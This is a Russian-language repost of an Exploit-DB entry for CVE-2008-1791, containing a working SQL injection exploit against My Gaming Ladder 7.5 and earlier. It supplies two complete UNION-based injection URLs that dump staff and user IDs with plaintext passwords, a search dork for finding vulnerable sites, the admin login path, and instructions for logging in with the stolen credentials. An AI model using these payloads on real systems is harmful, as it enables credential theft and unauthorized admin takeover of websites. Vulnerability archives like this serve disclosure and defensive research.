- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5401
- Проверка EDB
-
- Пройдено
- Автор
- T0PP8UZZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1791
- Дата публикации
- 2008-04-07
Код:
--==+================================================================================+==--
--==+ My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz
SITE: www.mygamingladder.com
DORK (altavista.com/googles): "Ladder Scripts by"
DESCRIPTION:
pull admin/user info from the database
EXPLOITS:
ADMINS/STAFF: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,id,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/staff/*
USERS: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,alias,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/staff/*
NOTE/TIP:
admin login is at "/adminhome.php"
passwords are in plaintext
once you have visited the injection, scroll down and you will see all user/passwords in RED text.
you must login to admincp with the admin ID this is the number next to the password.
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+================================================================================+==--
--==+ My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-07]
- Источник
- www.exploit-db.com